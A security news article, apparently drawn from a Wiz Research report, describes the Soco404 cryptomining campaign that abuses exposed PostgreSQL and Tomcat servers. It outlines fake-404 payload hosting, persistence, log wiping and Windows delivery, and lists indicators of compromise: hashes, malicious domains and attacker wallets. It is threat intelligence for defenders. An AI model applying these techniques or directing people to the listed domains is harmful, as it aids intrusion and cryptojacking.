Beware of Fake Error Pages Deploying Platform-Specific Malware on Linux and Windows Systems
Wiz Research has uncovered an active cryptomining campaign, dubbed Soco404, that exploits misconfigurations in PostgreSQL databases and other cloud services to deploy platform-specific malware on both Linux and Windows systems.
This operation, part of a broader crypto-scam infrastructure, leverages opportunistic scanning for exposed services, abusing features like PostgreSQL’s COPY FROM PROGRAM for remote code execution (MITRE T1190).
Attackers target publicly accessible instances, which Wiz data indicates affect nearly one-third of self-hosted PostgreSQL deployments in cloud environments, representing a high-risk attack surface.
Exploitation of Cloud Misconfigurations
By infiltrating via weak credentials or vulnerabilities such as CVE-2025-24813 in Apache Tomcat, the threat actors host payloads on compromised legitimate servers, including a notable Korean transportation website, to distribute malware while evading detection.
The campaign employs process masquerading (MITRE T1036.005), disguising malicious binaries as legitimate system processes like sd-pam or kernel workers, and ensures persistence through cron jobs (MITRE T1053.003) and modifications to shell initialization files such as .bashrc and .profile (MITRE T1546.004).
Malware payloads are ingeniously embedded as base64-encoded blobs within fake 404 error pages hosted on Google Sites and custom domains, which display innocuous error messages but facilitate payload extraction and execution upon access.

In-Depth Technical Breakdown
In the Linux variant, attackers execute an in-memory dropper script, soco.sh, fetched via tools like curl or wget from compromised Apache Tomcat servers (MITRE T1105).
This script downloads a UPX-packed Go binary obfuscated with Garble (MITRE T1027), which unpacks in memory, spawns child processes communicating over local sockets (MITRE T1559), and connects to C2 domains like www.fastsoco.top for the main payload.
The binary eliminates competing miners by clearing ld.so.preload, killing rogue processes, and wiping logs (MITRE T1070.002), while optimizing system resources for mining if running as root, such as enabling huge pages and tweaking MSR registers for AMD or Intel CPUs.
Persistence is reinforced by cron entries and shell file injections, leading to cryptocurrency mining on pools like c3pool and moneroocean using specific wallet addresses.
For Windows, the payload ok.exe is delivered via certutil, PowerShell Invoke-WebRequest, or curl fallbacks, dropping to writable paths like C:UsersPublic.
It establishes persistence as a service (MITRE T1543.003) with random names, injects into conhost.exe (MITRE T1055), deploys the WinRing0.sys driver for resource access, and halts event logging (MITRE T1562.002) before initiating mining with the same wallets.
Evidence links Soco404 to crypto-scam sites like seeyoume.top, which mimic legitimate exchanges and embed similar payloads, suggesting a versatile operation blending cryptojacking with social engineering.
Wiz’s Dynamic Scanner identifies exposed PostgreSQL with weak credentials, while the Runtime Sensor detects anomalous behaviors from exploitation to mining (MITRE T1496). This campaign remains active, with dynamic worker counts in mining pools indicating ongoing infections.
Indicators of Compromise (IOCs)
Indicator | Description |
---|---|
c9bb137d56fab7d52b3dbc85ae754b79d861a118bfb99566faaa342c978285ff | SHA-256 soco.sh |
bac4b166dec1df8aa823a15136c82c8b50960b11a0c4da68b8d7dedcb0f3a794 | SHA-256 soco.sh |
c67e876d7b3ae5f3c4fd626d8ba62e77bd47dfdf51f7a4438edd64bd0f88ce3a | SHA-256 soco.sh |
039caa15c1a54b49250717e68cd1a78a4be17b80e8062441c340eba0674e5926 | SHA-256 of ldr.sh |
0ad013c5166900b9c57a7ff771dbbf8b11f8a3be46a85cff6ced83ceb1a38f8d | SHA-256 of ldr.sh |
68bb9e294ba7f1b0426e16abbdb5c8f29daa8e8d98aee7a430ead97f2ffadd3a | SHA-256 of ELF malware |
8d06979a38ee5ef6f03817a1d16ab75171528cfaf8f743bfe64b45abd6c26142 | SHA-256 of ok.exe Windows malware |
https://sites.google.com/view/2025soco/ | Payload hosting site |
https://sites.google.com/view/dblikes | Payload hosting site |
https://sites.google.com/view/sogoto | Payload hosting site |
https://sites.google.com/view/osk05 | Payload hosting site |
www.fastsoco.top | Payload hosting site |
dblikes.cyou | Payload hosting site |
seeyoume.top | Payload hosting site |
arcticoins.com | Crypto scam domain |
diamondcapitalcrypro.com | Crypto scam domain |
nordicicoins.com | Crypto scam domain |
hkcapitals.com | Crypto scam domain |
auto.c3pool.org | Mining pool |
gulf.moneroocean.stream | Mining pool |
483F2xjkCUegxPM7wAexam1Be67EqDRZpS7azk8hcGETSustmuxd1Agffa3XSHFyzeFprLyHKm37bTPShFUTKgctMSBVuuK | Attacker’s crypto wallet address |
8BmVXbfsnRsiyPfUxsfnyyA9LqXvUsF2DYBX3wUmCEtejnBMyTiXe3XDCvq4REjmviEc5J1gomsnv7e4wYy1c5Pz3VadeyZ | Attacker’s crypto wallet address |
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
Source link